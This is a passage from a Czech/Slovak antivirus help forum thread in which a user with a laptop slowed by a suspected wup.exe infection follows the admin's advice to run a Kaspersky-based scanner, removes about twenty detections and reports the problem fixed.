No išlo to v pohode, ale pri spustenom Firefox sa znovu niečo spustilo a NB začal makať na plne obrátky a začal sa prehrievať. Pozrel som do Správcu úloh a je tam spustený súbor wup.exe dal som to do google a našlo to že je to nejaký vírus.
- Přílohy
-
- wup 800x600.png (352.02 KiB) Zobrazeno 1684 x
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
OK. Udělejte kompletní sken AVPTool: http://www.viry.cz/forum/viewtopic.php?f=29&t=58179 . Utiltiu stáhněte, spusťte, nechte pracovat a po skončení akce smažte vše, co najde.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
Spustil som Kaspersky, nepodarilo sa mi z toho vytiahnuť nejaký log, ale našlo to asi 20 infekcii medzi nimi aj wup.exe. Všetko som to dal zmazať a zatiaľ sa zdá že to pomohlo. Už hodinu mám zapnutý Firefox a NB frčí v pohode.
Takže veľmi pekne ďakujem a idem prispieť na prevádzku tohto fóra aby táto služba fungovala čo najdlhšie.
Takže veľmi pekne ďakujem a idem prispieť na prevádzku tohto fóra aby táto služba fungovala čo najdlhšie.
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Tak AVPTool je jen free skener postavený na enginu Kasperského. Takže pokud jste vše smazal, mělo by to být OK.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
No použil som to čo ste mi poradil podľa odkazu no nachádza sa tam už iná FREE verzia toho soft. Kaspersky
Virus Removal Tool
https://www.kaspersky.com/downloads/tha ... ool?form=1
To len pre informáciu
Ešte raz vďaka
Virus Removal Tool
https://www.kaspersky.com/downloads/tha ... ool?form=1
To len pre informáciu
Ešte raz vďaka
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Informace v odkazu, bohužel není aktuální, o tom víme, proto popisuji, co s tím máte dělat. Nemáte zač! 
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Přispějete na provoz fóra?